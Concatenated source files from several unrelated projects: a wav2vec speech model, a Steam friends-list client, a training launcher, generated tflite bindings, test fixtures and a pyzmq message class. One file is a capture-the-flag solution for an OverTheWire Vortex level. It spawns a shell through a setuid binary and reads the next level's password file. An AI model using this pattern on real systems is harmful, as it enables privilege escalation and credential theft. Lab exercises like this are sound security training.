parser.add_argument('--skip-connections-feat', action='store_true',
help='if set, adds skip connections to the feature extractor')
parser.add_argument('--skip-connections-agg', action='store_true',
help='if set, adds skip connections to the aggregator')
parser.add_argument('--residual-scale', type=float, metavar='D',
help='scales residual by sqrt(value)')
parser.add_argument('--log-compression', action='store_true',
help='if set, adds a log compression to feature extractor')
parser.add_argument('--balanced-classes', action='store_true',
help='if set, loss is scaled to balance for number of negatives')
parser.add_argument('--project-features', choices=['none', 'same', 'new'],
help='if not none, features are projected using the (same or new) aggregator')
parser.add_argument('--non-affine-group-norm', action='store_true',
help='if set, group norm is not affine')
parser.add_argument('--offset', help='if set, introduces an offset from target to predictions. '
'if set to "auto", it is computed automatically from the receptive field')
@classmethod
def build_model(cls, args, task):
"""Build a new model instance."""
# make sure all arguments are present in older models
base_wav2vec_architecture(args)
model = Wav2VecModel(args)
print(model)
return model
def __init__(self, args):
super().__init__()
self.prediction_steps = args.prediction_steps
offset = args.offset
if args.encoder == 'cnn':
feature_enc_layers = eval(args.conv_feature_layers)
self.feature_extractor = ConvFeatureExtractionModel(
conv_layers=feature_enc_layers,
dropout=0.,
log_compression=args.log_compression,
skip_connections=args.skip_connections_feat,
residual_scale=args.residual_scale,
non_affine_group_norm=args.non_affine_group_norm,
)
embed = feature_enc_layers[-1][0]
else:
raise Exception('unknown encoder type ' + args.encoder)
if args.offset == 'auto':
assert args.encoder == 'cnn'
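            # compute the receptive field (rin, in input samples) and the cumulative stride (jin)
            # of the conv stack, then express the receptive field in output frames to use as the
            # minimum prediction offset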
jin = 0
rin = 0
for _, k, stride in feature_enc_layers:
if rin == 0:
rin = k
rin = rin + (k - 1) * jin
if jin == 0:
jin = stride
else:
jin *= stride
offset = math.ceil(rin / jin)
offset = int(offset)
def make_aggregator():
if args.aggregator == 'cnn':
agg_layers = eval(args.conv_aggregator_layers)
agg_dim = agg_layers[-1][0]
feature_aggregator = ConvAggegator(
conv_layers=agg_layers,
embed=embed,
dropout=args.dropout,
skip_connections=args.skip_connections_agg,
residual_scale=args.residual_scale,
non_affine_group_norm=args.non_affine_group_norm,
conv_bias=not args.no_conv_bias,
zero_pad=args.agg_zero_pad,
)
elif args.aggregator == 'gru':
agg_dim = args.gru_dim
feature_aggregator = nn.Sequential(
TransposeLast(),
nn.GRU(
input_size=embed,
hidden_size=agg_dim,
num_layers=1,
dropout=args.dropout,
),
TransposeLast(deconstruct_idx=0),
)
else:
raise Exception('unknown aggregator type ' + args.aggregator)
return feature_aggregator, agg_dim
self.feature_aggregator, agg_dim = make_aggregator()
self.wav2vec_predictions = Wav2VecPredictionsModel(
in_dim=agg_dim,
out_dim=embed,
prediction_steps=args.prediction_steps,
n_negatives=args.num_negatives,
cross_sample_negatives=args.cross_sample_negatives,
sample_distance=args.sample_distance,
dropout=args.dropout,
offset=offset,
balanced_classes=args.balanced_classes,
)
self.dropout_feats = nn.Dropout(p=args.dropout_features)
self.dropout_agg = nn.Dropout(p=args.dropout_agg)
if args.project_features == 'none':
self.project_features = None
elif args.project_features == 'same':
self.project_features = self.feature_aggregator
elif args.project_features == 'new':
self.project_features, _ = make_aggregator()
def forward(self, source):
result = {}
features = self.feature_extractor(source)
x = self.dropout_feats(features)
x = self.feature_aggregator(x)
x = self.dropout_agg(x)
if self.project_features is not None:
features = self.project_features(features)
x, targets = self.wav2vec_predictions(x, features)
result['cpc_logits'] = x
result['cpc_targets'] = targets
return result
def upgrade_state_dict_named(self, state_dict, name):
return state_dict
def max_positions(self):
"""Maximum length supported by the model."""
return sys.maxsize
def get_logits(self, net_output):
logits = net_output['cpc_logits']
return logits
def get_targets(self, sample, net_output, expand_steps=True):
t = net_output['cpc_targets']
return t.contiguous()
def get_target_weights(self, targets, net_output):
targets = net_output['cpc_targets']
if isinstance(targets, tuple) and targets[-1] is not None:
return targets[-1]
return 1.
class TransposeLast(nn.Module):
def __init__(self, deconstruct_idx=None):
super().__init__()
self.deconstruct_idx = deconstruct_idx
def forward(self, x):
if self.deconstruct_idx is not None:
x = x[self.deconstruct_idx]
return x.transpose(-2, -1)
class Fp32GroupNorm(nn.GroupNorm):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def forward(self, input):
output = F.group_norm(
input.float(), self.num_groups, self.weight.float() if self.weight is not None else None,
self.bias.float() if self.bias is not None else None, self.eps)
return output.type_as(input)
class Fp32LayerNorm(nn.LayerNorm):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def forward(self, input):
output = F.layer_norm(
input.float(), self.normalized_shape, self.weight.float() if self.weight is not None else None,
self.bias.float() if self.bias is not None else None, self.eps)
return output.type_as(input)
def norm_block(is_layer_norm, dim, affine=True):
if is_layer_norm:
mod = nn.Sequential(
TransposeLast(),
Fp32LayerNorm(dim, elementwise_affine=affine),
TransposeLast(),
)
else:
mod = Fp32GroupNorm(1, dim, affine=affine)
return mod
class ConvFeatureExtractionModel(nn.Module):
def __init__(self, conv_layers, dropout, log_compression, skip_connections, residual_scale, non_affine_group_norm):
super().__init__()
def block(n_in, n_out, k, stride):
return nn.Sequential(
nn.Conv1d(n_in, n_out, k, stride=stride, bias=False),
nn.Dropout(p=dropout),
norm_block(is_layer_norm=False, dim=n_out, affine=not non_affine_group_norm),
nn.ReLU(),
)
in_d = 1
self.conv_layers = nn.ModuleList()
for i, (dim, k, stride) in enumerate(conv_layers):
self.conv_layers.append(
block(in_d, dim, k, stride))
in_d = dim
self.log_compression = log_compression
self.skip_connections = skip_connections
self.residual_scale = math.sqrt(residual_scale)
def forward(self, x):
# BxT -> BxCxT
x = x.unsqueeze(1)
for conv in self.conv_layers:
residual = x
x = conv(x)
if self.skip_connections and x.size(1) == residual.size(1):
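                # downsample the residual along time so its length matches the strided conv output before adding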
tsz = x.size(2)
r_tsz = residual.size(2)
residual = residual[..., ::r_tsz // tsz][..., :tsz]
x = (x + residual) * self.residual_scale
if self.log_compression:
x = x.abs()
x = x + 1
x = x.log()
return x
class ZeroPad1d(nn.Module):
def __init__(self, pad_left, pad_right):
super().__init__()
self.pad_left = pad_left
self.pad_right = pad_right
def forward(self, x):
return F.pad(x, (self.pad_left, self.pad_right))
class ConvAggegator(nn.Module):
def __init__(self, conv_layers, embed, dropout, skip_connections, residual_scale, non_affine_group_norm, conv_bias,
zero_pad):
super().__init__()
def block(n_in, n_out, k, stride):
# padding dims only really make sense for stride = 1
ka = k // 2
kb = ka - 1 if k % 2 == 0 else ka
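            # pad k-1 frames on the left only, so the aggregation stays causal (no access to future frames)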
pad = ZeroPad1d(ka + kb, 0) if zero_pad else nn.ReplicationPad1d((ka + kb, 0))
return nn.Sequential(
pad,
nn.Conv1d(n_in, n_out, k, stride=stride, bias=conv_bias),
nn.Dropout(p=dropout),
norm_block(False, n_out, affine=not non_affine_group_norm),
nn.ReLU(),
)
in_d = embed
self.conv_layers = nn.ModuleList()
self.residual_proj = nn.ModuleList()
for i, (dim, k, stride) in enumerate(conv_layers):
if in_d != dim and skip_connections:
self.residual_proj.append(
nn.Conv1d(in_d, dim, 1, bias=False),
)
else:
self.residual_proj.append(None)
self.conv_layers.append(
block(in_d, dim, k, stride))
in_d = dim
self.conv_layers = nn.Sequential(*self.conv_layers)
self.skip_connections = skip_connections
self.residual_scale = math.sqrt(residual_scale)
def forward(self, x):
for rproj, conv in zip(self.residual_proj, self.conv_layers):
residual = x
x = conv(x)
if self.skip_connections:
if rproj is not None:
residual = rproj(residual)
x = (x + residual) * self.residual_scale
return x
class Wav2VecPredictionsModel(nn.Module):
def __init__(self, in_dim, out_dim, prediction_steps, n_negatives, cross_sample_negatives, sample_distance,
dropout, offset, balanced_classes):
super().__init__()
self.n_negatives = n_negatives
self.cross_sample_negatives = cross_sample_negatives
self.sample_distance = sample_distance
self.project_to_steps = nn.ConvTranspose2d(in_dim, out_dim, (1, prediction_steps))
self.dropout = nn.Dropout(p=dropout)
self.offset = offset
self.balanced_classes = balanced_classes
def sample_negatives(self, y):
bsz, fsz, tsz = y.shape
y = y.transpose(0, 1) # BCT -> CBT
y = y.contiguous().view(fsz, -1) # CBT => C(BxT)
if self.cross_sample_negatives:
high = tsz * bsz
assert self.sample_distance is None, 'sample distance is not supported with cross sampling'
else:
high = tsz if self.sample_distance is None else min(tsz, self.sample_distance)
neg_idxs = torch.randint(low=0, high=high, size=(bsz, self.n_negatives * tsz))
if self.sample_distance is not None and self.sample_distance < tsz:
neg_idxs += torch.cat(
[torch.arange(start=1, end=tsz - self.sample_distance, device=neg_idxs.device, dtype=neg_idxs.dtype),
torch.arange(start=tsz - self.sample_distance, end=tsz - self.sample_distance * 2 - 1, step=-1,
device=neg_idxs.device, dtype=neg_idxs.dtype)])
if not self.cross_sample_negatives:
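            # shift indices per batch element so each example draws negatives only from its own timesteps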
for i in range(1, bsz):
neg_idxs[i] += i * high
negs = y[..., neg_idxs.view(-1)]
negs = negs.view(fsz, bsz, self.n_negatives, tsz).permute(2, 1, 0, 3) # to NxBxCxT
return negs
def forward(self, x, y):
negatives = self.sample_negatives(y)
y = y.unsqueeze(0)
targets = torch.cat([y, negatives], dim=0)
x = x.unsqueeze(-1)
x = self.project_to_steps(x) # BxCxTxS
x = self.dropout(x)
x = x.unsqueeze(0).expand(targets.size(0), -1, -1, -1, -1)
copies, bsz, dim, tsz, steps = x.shape
steps = min(steps, tsz - self.offset)
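        # flat score buffer: one entry per (prediction step, valid timestep, target copy, batch element);
        # later steps have fewer valid timesteps, hence the triangular correction term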
predictions = x.new(bsz * copies * (tsz - self.offset + 1) * steps - ((steps + 1) * steps // 2) * copies * bsz)
labels = torch.zeros_like(predictions)
weights = torch.full_like(labels, 1 / self.n_negatives) if self.balanced_classes else None
start = end = 0
for i in range(steps):
offset = i + self.offset
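            # score step i: dot product between the context at time t and every target copy
            # (positive + negatives) at time t + offset; the first pos_num entries are the positives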
end = start + (tsz - offset) * bsz * copies
pos_num = (end - start) // copies
predictions[start:end] = (x[..., :-offset, i] * targets[..., offset:]).sum(dim=2).flatten()
labels[start:start + pos_num] = 1.
if weights is not None:
weights[start:start + pos_num] = 1.
start = end
assert end == predictions.numel(), '{} != {}'.format(end, predictions.numel())
if weights is not None:
labels = (labels, weights)
return predictions, labels
@register_model_architecture('wav2vec', 'wav2vec')
def base_wav2vec_architecture(args):
conv_feature_layers = '[(512, 10, 5)]'
conv_feature_layers += ' + [(512, 8, 4)]'
conv_feature_layers += ' + [(512, 4, 2)] * 3'
args.conv_feature_layers = getattr(args, 'conv_feature_layers', conv_feature_layers)
args.conv_aggregator_layers = getattr(args, 'conv_aggregator_layers', '[(512, 3, 1)] * 9')
args.prediction_steps = getattr(args, 'prediction_steps', 12)
args.num_negatives = getattr(args, 'num_negatives', 1)
args.sample_distance = getattr(args, 'sample_distance', None)
args.cross_sample_negatives = getattr(args, 'cross_sample_negatives', False)
args.dropout = getattr(args, 'dropout', 0.)
args.dropout_features = getattr(args, 'dropout_features', 0.)
args.dropout_agg = getattr(args, 'dropout_agg', 0.)
args.encoder = getattr(args, 'encoder', 'cnn')
args.aggregator = getattr(args, 'aggregator', 'cnn')
args.skip_connections_feat = getattr(args, 'skip_connections_feat', False)
args.skip_connections_agg = getattr(args, 'skip_connections_agg', False)
args.residual_scale = getattr(args, 'residual_scale', 0.5)
args.gru_dim = getattr(args, 'gru_dim', 512)
args.no_conv_bias = getattr(args, 'no_conv_bias', False)
args.agg_zero_pad = getattr(args, 'agg_zero_pad', False)
args.log_compression = getattr(args, 'log_compression', False)
args.balanced_classes = getattr(args, 'balanced_classes', False)
args.project_features = getattr(args, 'project_features', 'none')
args.non_affine_group_norm = getattr(args, 'non_affine_group_norm', False)
args.offset = getattr(args, 'offset', 'auto')
|
steam/client/builtins/friends.py | tjensen/steam | 727 | 11086502 | <reponame>tjensen/steam<gh_stars>100-1000
import logging
from six import itervalues
from eventemitter import EventEmitter
from steam.steamid import SteamID, intBase
from steam.enums import EResult, EFriendRelationship
from steam.enums.emsg import EMsg
from steam.core.msg import MsgProto
from steam.client.user import SteamUser
class Friends(object):
def __init__(self, *args, **kwargs):
super(Friends, self).__init__(*args, **kwargs)
#: :class:`.SteamFriendlist` instance
self.friends = SteamFriendlist(self, logger_name="%s.friends" % self.__class__.__name__)
class SteamFriendlist(EventEmitter):
"""SteamFriendlist is an object that keeps state of user's friend list.
It's essentially a :class:`list` of :class:`.SteamUser`.
You can iterate over it, check if it contains a particular ``steam id``,
or get :class:`.SteamUser` for a ``steam id``.
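    A minimal usage sketch (illustrative only; assumes ``client`` is a logged-in
    client using the :class:`.Friends` mixin, so this list is available as
    ``client.friends``, and ``a_steam_id`` is a :class:`.SteamID`)::
        for friend in client.friends:            # iterate over SteamUser entries
            print(friend.steam_id)
        if a_steam_id in client.friends:         # membership check
            user = client.friends[a_steam_id]    # lookup returns a SteamUser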
"""
EVENT_READY = 'ready'
"""Friend list is ready for use
"""
EVENT_FRIEND_INVITE = 'friend_invite'
"""New or existing friend invite
:param user: steam user instance
:type user: :class:`.SteamUser`
"""
EVENT_FRIEND_NEW = 'friend_new'
"""Friendship established (after being accepted, or accepting)
:param user: steam user instance
:type user: :class:`.SteamUser`
"""
EVENT_FRIEND_REMOVED = 'friend_removed'
"""No longer a friend (removed by either side)
:param user: steam user instance
:type user: :class:`.SteamUser`
"""
EVENT_FRIEND_ADD_RESULT = 'friend_add_result'
"""Result response after adding a friend
:param eresult: result
:type eresult: :class:`.EResult`
:param steam_id: steam id
:type steam_id: :class:`.SteamID`
"""
ready = False #: indicates whether friend list is ready for use
def __init__(self, client, logger_name='SteamFriendList'):
self._LOG = logging.getLogger(logger_name)
self._fr = {}
self._steam = client
self._steam.on(EMsg.ClientAddFriendResponse, self._handle_add_friend_result)
self._steam.on(EMsg.ClientFriendsList, self._handle_friends_list)
self._steam.on(self._steam.EVENT_DISCONNECTED, self._handle_disconnect)
def emit(self, event, *args):
if event is not None:
self._LOG.debug("Emit event: %s" % repr(event))
EventEmitter.emit(self, event, *args)
def _handle_disconnect(self):
self.ready = False
self._fr.clear()
def _handle_add_friend_result(self, message):
eresult = EResult(message.body.eresult)
steam_id = SteamID(message.body.steam_id_added)
self.emit(self.EVENT_FRIEND_ADD_RESULT, eresult, steam_id)
def _handle_friends_list(self, message):
incremental = message.body.bincremental
if incremental == False:
self._fr.clear()
steamids_to_check = set()
# update internal friends list
for friend in message.body.friends:
steamid = SteamID(friend.ulfriendid)
if steamid.type != steamid.EType.Individual:
continue
suser = self._steam.get_user(steamid, False)
rel = EFriendRelationship(friend.efriendrelationship)
if steamid not in self._fr and rel != EFriendRelationship.NONE: # 0
self._fr[steamid] = suser
suser.relationship = rel
steamids_to_check.add(steamid)
if rel in (2,4): # RequestRecipient = 2, RequestInitiator = 4
if rel == EFriendRelationship.RequestRecipient:
self.emit(self.EVENT_FRIEND_INVITE, suser)
else:
oldrel, suser.relationship = suser.relationship, rel
if rel == EFriendRelationship.NONE:
suser = self._fr.pop(steamid, None)
if suser and oldrel not in (EFriendRelationship.Ignored, 0):
self.emit(self.EVENT_FRIEND_REMOVED, suser)
elif oldrel in (2,4) and rel == EFriendRelationship.Friend:
self.emit(self.EVENT_FRIEND_NEW, suser)
# request persona state for any new entries
if steamids_to_check:
self._steam.request_persona_state(steamids_to_check)
if not self.ready:
self.ready = True
self.emit(self.EVENT_READY)
def __repr__(self):
return "<%s %d users>" % (
self.__class__.__name__,
len(self._fr),
)
def __len__(self):
return len(self._fr)
def __iter__(self):
return itervalues(self._fr)
def __list__(self):
return list(iter(self))
def __getitem__(self, key):
if isinstance(key, SteamUser):
key = key.steam_id
return self._fr[key]
def __contains__(self, friend):
if isinstance(friend, SteamUser):
friend = friend.steam_id
return friend in self._fr
def add(self, steamid_or_accountname_or_email):
"""
Add/Accept a steam user to be your friend.
When someone sends you an invite, use this method to accept it.
:param steamid_or_accountname_or_email: steamid, account name, or email
:type steamid_or_accountname_or_email: :class:`int`, :class:`.SteamID`, :class:`.SteamUser`, :class:`str`
.. note::
            Adding by email does not work. It's only mentioned for the sake of completeness.
"""
m = MsgProto(EMsg.ClientAddFriend)
if isinstance(steamid_or_accountname_or_email, (intBase, int)):
m.body.steamid_to_add = steamid_or_accountname_or_email
elif isinstance(steamid_or_accountname_or_email, SteamUser):
m.body.steamid_to_add = steamid_or_accountname_or_email.steam_id
else:
m.body.accountname_or_email_to_add = steamid_or_accountname_or_email
self._steam.send_job(m)
def remove(self, steamid):
"""
Remove a friend
:param steamid: their steamid
:type steamid: :class:`int`, :class:`.SteamID`, :class:`.SteamUser`
"""
if isinstance(steamid, SteamUser):
steamid = steamid.steam_id
self._steam.send(MsgProto(EMsg.ClientRemoveFriend), {'friendid': steamid})
def block(self, steamid):
"""
Block Steam user
:param steamid: their steamid
:type steamid: :class:`int`, :class:`.SteamID`, :class:`.SteamUser`
:return: result
:rtype: :class:`EResult`
"""
if isinstance(steamid, SteamUser):
steamid = steamid.steam_id
elif not isinstance(steamid, SteamID):
steamid = SteamID(steamid)
resp = self._steam.send_um_and_wait("Player.IgnoreFriend#1",
{"steamid": steamid},
timeout=10)
if not resp:
return EResult.Timeout
elif resp.header.eresult == EResult.OK:
if steamid not in self._fr:
self._fr[steamid] = self._steam.get_user(steamid, False)
self._fr[steamid].relationship = EFriendRelationship(resp.body.friend_relationship)
return resp.header.eresult
def unblock(self, steamid):
"""
Unblock Steam user
:param steamid: their steamid
:type steamid: :class:`int`, :class:`.SteamID`, :class:`.SteamUser`
:return: result
:rtype: :class:`EResult`
"""
if isinstance(steamid, SteamUser):
steamid = steamid.steam_id
elif not isinstance(steamid, SteamID):
steamid = SteamID(steamid)
resp = self._steam.send_um_and_wait("Player.IgnoreFriend#1",
{"steamid": steamid, "unignore": True},
timeout=10)
if not resp:
return EResult.Timeout
elif resp.header.eresult == EResult.OK:
if steamid in self._fr:
self._fr[steamid].relationship = EFriendRelationship(resp.body.friend_relationship)
return resp.header.eresult
|
src/smart_compose/run_smart_compose.py | StarWang/detext | 1,229 | 11086512 | <gh_stars>1000+
import sys
import tempfile
from dataclasses import asdict
import tensorflow as tf
from absl import logging
from official.utils.misc import distribution_utils
from smart_compose.args import SmartComposeArg
from smart_compose.train import train
from smart_compose.utils import distributed_utils, parsing_utils
def main(argv):
""" This is the main method for training the model.
:param argv: training parameters
"""
argument = SmartComposeArg.__from_argv__(argv[1:], error_on_unknown=False)
logging.set_verbosity(logging.INFO)
logging.info(f"Args:\n {argument}")
hparams = argument
strategy = distribution_utils.get_distribution_strategy(hparams.distribution_strategy, num_gpus=hparams.num_gpu, all_reduce_alg=hparams.all_reduce_alg)
logging.info(f"***********Num replica: {strategy.num_replicas_in_sync}***********")
create_output_dir(hparams.resume_training, hparams.out_dir, strategy)
save_hparams(hparams.out_dir, parsing_utils.HParams(**asdict(argument)), strategy)
logging.info("***********Smart Compose Training***********")
return train.train(strategy, hparams)
def save_hparams(out_dir, hparams, strategy):
"""Saves hparams to out_dir"""
is_chief = distributed_utils.is_chief(strategy)
if not is_chief:
out_dir = tempfile.mkdtemp()
parsing_utils.save_hparams(out_dir, hparams)
if not is_chief:
tf.io.gfile.remove(parsing_utils._get_hparam_path(out_dir))
def create_output_dir(resume_training, out_dir, strategy):
"""Creates output directory if not exists"""
is_chief = distributed_utils.is_chief(strategy)
if not is_chief:
out_dir = tempfile.mkdtemp()
if not resume_training:
if tf.io.gfile.exists(out_dir):
logging.info("Removing previous output directory...")
tf.io.gfile.rmtree(out_dir)
# If output directory deleted or does not exist, create the directory.
if not tf.io.gfile.exists(out_dir):
logging.info('Creating dirs recursively at: {0}'.format(out_dir))
tf.io.gfile.makedirs(out_dir)
if not is_chief:
tf.io.gfile.rmtree(out_dir)
if __name__ == '__main__':
main(sys.argv)
|
wargames/overthewire-vortex/level6/win.py | spchal/pwntools-write-ups | 456 | 11086514 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
level = 6
host = 'vortex.labs.overthewire.org'
user = 'vortex%i' % level
chal = 'vortex%i' % level
password = args['PASSWORD']
passfile = '/etc/vortex_pass/vortex%i' % (level+1)
binary = '/vortex/%s' % chal
shell = ssh(host=host, user=user, password=password)
if not os.path.exists(chal):
shell.download_file(binary)
os.chmod(chal, 0755)
sh = shell.run('''
python -c "
import sys, os
os.execve(%r, ['/bin/sh'], {'a':'b'})
"
''' % binary)
sh.clean(2)
sh.sendline('id')
log.success('id: ' + sh.recvline().strip())
sh.sendline('cat %s' % passfile)
password = sh.recvline().strip()
log.success('Password: %s' % password)
print password
|
service/generated_flatbuffers/tflite/LSTMOptions.py | lcrh/falken | 213 | 11086521 | <gh_stars>100-1000
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# automatically generated by the FlatBuffers compiler, do not modify
# namespace: tflite
import flatbuffers
from flatbuffers.compat import import_numpy
np = import_numpy()
class LSTMOptions(object):
__slots__ = ['_tab']
@classmethod
def GetRootAsLSTMOptions(cls, buf, offset):
n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
x = LSTMOptions()
x.Init(buf, n + offset)
return x
@classmethod
def LSTMOptionsBufferHasIdentifier(cls, buf, offset, size_prefixed=False):
return flatbuffers.util.BufferHasIdentifier(buf, offset, b"\x54\x46\x4C\x33", size_prefixed=size_prefixed)
# LSTMOptions
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
# LSTMOptions
def FusedActivationFunction(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Int8Flags, o + self._tab.Pos)
return 0
# LSTMOptions
def CellClip(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Float32Flags, o + self._tab.Pos)
return 0.0
# LSTMOptions
def ProjClip(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Float32Flags, o + self._tab.Pos)
return 0.0
# LSTMOptions
def KernelType(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(10))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Int8Flags, o + self._tab.Pos)
return 0
# LSTMOptions
def AsymmetricQuantizeInputs(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12))
if o != 0:
return bool(self._tab.Get(flatbuffers.number_types.BoolFlags, o + self._tab.Pos))
return False
def LSTMOptionsStart(builder): builder.StartObject(5)
def LSTMOptionsAddFusedActivationFunction(builder, fusedActivationFunction): builder.PrependInt8Slot(0, fusedActivationFunction, 0)
def LSTMOptionsAddCellClip(builder, cellClip): builder.PrependFloat32Slot(1, cellClip, 0.0)
def LSTMOptionsAddProjClip(builder, projClip): builder.PrependFloat32Slot(2, projClip, 0.0)
def LSTMOptionsAddKernelType(builder, kernelType): builder.PrependInt8Slot(3, kernelType, 0)
def LSTMOptionsAddAsymmetricQuantizeInputs(builder, asymmetricQuantizeInputs): builder.PrependBoolSlot(4, asymmetricQuantizeInputs, 0)
def LSTMOptionsEnd(builder): return builder.EndObject()
class LSTMOptionsT(object):
# LSTMOptionsT
def __init__(self):
self.fusedActivationFunction = 0 # type: int
self.cellClip = 0.0 # type: float
self.projClip = 0.0 # type: float
self.kernelType = 0 # type: int
self.asymmetricQuantizeInputs = False # type: bool
@classmethod
def InitFromBuf(cls, buf, pos):
lSTMOptions = LSTMOptions()
lSTMOptions.Init(buf, pos)
return cls.InitFromObj(lSTMOptions)
@classmethod
def InitFromObj(cls, lSTMOptions):
x = LSTMOptionsT()
x._UnPack(lSTMOptions)
return x
# LSTMOptionsT
def _UnPack(self, lSTMOptions):
if lSTMOptions is None:
return
self.fusedActivationFunction = lSTMOptions.FusedActivationFunction()
self.cellClip = lSTMOptions.CellClip()
self.projClip = lSTMOptions.ProjClip()
self.kernelType = lSTMOptions.KernelType()
self.asymmetricQuantizeInputs = lSTMOptions.AsymmetricQuantizeInputs()
# LSTMOptionsT
def Pack(self, builder):
LSTMOptionsStart(builder)
LSTMOptionsAddFusedActivationFunction(builder, self.fusedActivationFunction)
LSTMOptionsAddCellClip(builder, self.cellClip)
LSTMOptionsAddProjClip(builder, self.projClip)
LSTMOptionsAddKernelType(builder, self.kernelType)
LSTMOptionsAddAsymmetricQuantizeInputs(builder, self.asymmetricQuantizeInputs)
lSTMOptions = LSTMOptionsEnd(builder)
return lSTMOptions
|
tests/conftest.py | cclauss/aiofile | 311 | 11086554 | <filename>tests/conftest.py
from functools import partial
import pytest
from caio import python_aio_asyncio
from aiofile import AIOFile, async_open
try:
from caio import thread_aio_asyncio
except ImportError:
thread_aio_asyncio = None
try:
from caio import linux_aio_asyncio
except ImportError:
linux_aio_asyncio = None
class DefaultContext:
__name__ = "default"
IMPLEMENTATIONS = list(
filter(
None, [
linux_aio_asyncio,
thread_aio_asyncio,
python_aio_asyncio,
DefaultContext(),
],
),
)
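# every test is parametrized over each available caio backend, plus a "default" entry
# for which the fixtures pass context=None and let aiofile pick its own implementation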
IMPLEMENTATION_NAMES = map(lambda x: x.__name__, IMPLEMENTATIONS)
@pytest.fixture(params=IMPLEMENTATIONS, ids=IMPLEMENTATION_NAMES)
async def aio_context(request, loop):
if isinstance(request.param, DefaultContext):
yield None
return
async with request.param.AsyncioContext(loop=loop) as context:
yield context
@pytest.fixture
def aio_file_maker(aio_context):
return partial(AIOFile, context=aio_context)
@pytest.fixture(name="async_open")
def async_open_maker(aio_context):
return partial(async_open, context=aio_context)
|
src/lib/utils/stress_test/.s/python/lib/python3.6/site-packages/zmq/backend/cffi/message.py | devsapp/fc-stress-desktop | 603 | 11086556 | <gh_stars>100-1000
"""Dummy Frame object"""
# Copyright (C) PyZMQ Developers
# Distributed under the terms of the Modified BSD License.
import errno
from threading import Event
from ._cffi import ffi, lib as C
from .constants import ETERM
import zmq
from zmq.utils.strtypes import unicode
import zmq.error
zmq_gc = None
try:
from __pypy__.bufferable import bufferable as maybe_bufferable
except ImportError:
maybe_bufferable = object
def _content(obj):
"""Return content of obj as bytes"""
if type(obj) is bytes:
return obj
if not isinstance(obj, memoryview):
obj = memoryview(obj)
return obj.tobytes()
def _check_rc(rc):
err = C.zmq_errno()
if rc == -1:
if err == errno.EINTR:
            raise zmq.error.InterruptedSystemCall(err)
elif err == errno.EAGAIN:
            raise zmq.error.Again(err)
elif err == ETERM:
raise zmq.error.ContextTerminated(err)
else:
raise zmq.error.ZMQError(err)
return 0
class Frame(maybe_bufferable):
_data = None
tracker = None
closed = False
more = False
_buffer = None
_bytes = None
_failed_init = False
tracker_event = None
zmq_msg = None
def __init__(self, data=None, track=False, copy=None, copy_threshold=None):
self._failed_init = True
self.zmq_msg = ffi.cast('zmq_msg_t[1]', C.malloc(ffi.sizeof("zmq_msg_t")))
# self.tracker should start finished
# except in the case where we are sharing memory with libzmq
if track:
self.tracker = zmq._FINISHED_TRACKER
if isinstance(data, unicode):
raise TypeError(
"Unicode objects not allowed. Only: bytes, buffer interfaces."
)
if data is None:
rc = C.zmq_msg_init(self.zmq_msg)
_check_rc(rc)
self._failed_init = False
return
self._data = data
if type(data) is bytes:
# avoid unnecessary copy on .bytes access
self._bytes = data
self._buffer = memoryview(data)
c_data = ffi.from_buffer(self._buffer)
data_len_c = self._buffer.nbytes
if copy is None:
if copy_threshold and data_len_c < copy_threshold:
copy = True
else:
copy = False
if copy:
# copy message data instead of sharing memory
rc = C.zmq_msg_init_size(self.zmq_msg, data_len_c)
_check_rc(rc)
ffi.buffer(C.zmq_msg_data(self.zmq_msg), data_len_c)[:] = self._buffer
self._failed_init = False
return
# Getting here means that we are doing a true zero-copy Frame,
# where libzmq and Python are sharing memory.
# Hook up garbage collection with MessageTracker and zmq_free_fn
# Event and MessageTracker for monitoring when zmq is done with data:
if track:
evt = Event()
self.tracker_event = evt
self.tracker = zmq.MessageTracker(evt)
# create the hint for zmq_free_fn
# two pointers: the zmq_gc context and a message to be sent to the zmq_gc PULL socket
# allows libzmq to signal to Python when it is done with Python-owned memory.
global zmq_gc
if zmq_gc is None:
from zmq.utils.garbage import gc as zmq_gc
# can't use ffi.new because it will be freed at the wrong time!
hint = ffi.cast("zhint[1]", C.malloc(ffi.sizeof("zhint")))
hint[0].id = zmq_gc.store(data, self.tracker_event)
if not zmq_gc._push_mutex:
zmq_gc._push_mutex = C.mutex_allocate()
hint[0].mutex = ffi.cast("mutex_t*", zmq_gc._push_mutex)
hint[0].sock = ffi.cast("void*", zmq_gc._push_socket.underlying)
# calls zmq_wrap_msg_init_data with the C.free_python_msg callback
rc = C.zmq_wrap_msg_init_data(
self.zmq_msg,
c_data,
data_len_c,
hint,
)
if rc != 0:
C.free(hint)
C.free(self.zmq_msg)
_check_rc(rc)
self._failed_init = False
def __del__(self):
if not self.closed and not self._failed_init:
self.close()
def close(self):
if self.closed or self._failed_init or self.zmq_msg is None:
return
self.closed = True
rc = C.zmq_msg_close(self.zmq_msg)
C.free(self.zmq_msg)
self.zmq_msg = None
if rc != 0:
_check_rc(rc)
def _buffer_from_zmq_msg(self):
"""one-time extract buffer from zmq_msg
for Frames created by recv
"""
if self._data is None:
self._data = ffi.buffer(
C.zmq_msg_data(self.zmq_msg), C.zmq_msg_size(self.zmq_msg)
)
if self._buffer is None:
self._buffer = memoryview(self._data)
@property
def buffer(self):
if self._buffer is None:
self._buffer_from_zmq_msg()
